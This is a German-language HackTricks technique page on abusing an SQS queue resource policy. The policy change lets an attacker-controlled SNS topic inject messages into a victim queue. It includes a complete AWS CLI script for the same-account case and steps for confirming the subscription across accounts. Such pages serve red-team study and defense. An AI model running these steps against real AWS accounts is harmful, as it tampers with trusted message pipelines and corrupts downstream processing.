AWS – SQS Cross-/Same-Account Injection via SNS Subscription + Queue Policy

Reading time: 4 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Beschreibung

Missbrauch einer SQS-Queue-Resource-Policy, um einem vom Angreifer kontrollierten SNS-Topic zu erlauben, Nachrichten in eine Opfer-SQS-Queue zu veröffentlichen. Im selben Account bestätigt sich eine SQS-Subscription zu einem SNS-Topic automatisch; bei kontoübergreifenden Szenarien müssen Sie das SubscriptionConfirmation-Token aus der Queue lesen und ConfirmSubscription aufrufen. Dadurch wird eine unaufgeforderte Nachrichteninjektion ermöglicht, der nachgelagerte Konsumenten möglicherweise implizit vertrauen.

Anforderungen

  • Möglichkeit, die Resource-Policy der Ziel-SQS-Queue zu ändern: sqs:SetQueueAttributes on the victim queue.
  • Möglichkeit, ein unter Angreiferkontrolle stehendes SNS-Topic zu erstellen/veröffentlichen: sns:CreateTopic, sns:Publish, and sns:Subscribe on the attacker account/topic.
  • Nur kontoübergreifend: temporäre sqs:ReceiveMessage auf der Opfer-Queue, um das Bestätigungstoken zu lesen und sns:ConfirmSubscription aufzurufen.

Ausnutzung im selben Account

bash
REGION=us-east-1
# 1) Create victim queue and capture URL/ARN
Q_URL=$(aws sqs create-queue --queue-name ht-victim-q --region $REGION --query QueueUrl --output text)
Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# 2) Create attacker SNS topic
TOPIC_ARN=$(aws sns create-topic --name ht-attacker-topic --region $REGION --query TopicArn --output text)

# 3) Allow that SNS topic to publish to the queue (queue resource policy)
cat > /tmp/ht-sqs-sns-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowSNSTopicPublish","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"SQS:SendMessage","Resource":"REPLACE_QUEUE_ARN","Condition":{"StringEquals":{"aws:SourceArn":"REPLACE_TOPIC_ARN"}}}]}
JSON
sed -i.bak "s#REPLACE_QUEUE_ARN#$Q_ARN#g; s#REPLACE_TOPIC_ARN#$TOPIC_ARN#g" /tmp/ht-sqs-sns-policy.json
# Provide the attribute as a JSON map so quoting works reliably
cat > /tmp/ht-attrs.json <<JSON
{
"Policy": "REPLACE_POLICY_JSON"
}
JSON
# Embed the policy file contents as a JSON string
POL_ESC=$(jq -Rs . /tmp/ht-sqs-sns-policy.json)
sed -i.bak "s#\"REPLACE_POLICY_JSON\"#$POL_ESC#g" /tmp/ht-attrs.json
aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes file:///tmp/ht-attrs.json

# 4) Subscribe the queue to the topic (auto-confirms same-account)
aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --region $REGION

# 5) Publish and verify injection
aws sns publish --topic-arn "$TOPIC_ARN" --message {pwn:sns->sqs} --region $REGION
aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --attribute-names All --message-attribute-names All

Cross-Account-Hinweise

  • Die obenstehende Queue-Policy muss das fremde TOPIC_ARN (Angreifer-Konto) erlauben.
  • Subscriptions werden nicht automatisch bestätigt. Gewähre dir temporär sqs:ReceiveMessage auf der Opfer-Queue, um die SubscriptionConfirmation Nachricht zu lesen und rufe dann sns confirm-subscription mit dem Token auf.

Auswirkungen

Mögliche Auswirkungen: Kontinuierliche unerwünschte Nachrichteninjektion in eine vertrauenswürdige SQS-Queue über SNS, was unbeabsichtigte Verarbeitung, Datenverschmutzung oder Missbrauch von Workflows auslösen kann.

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks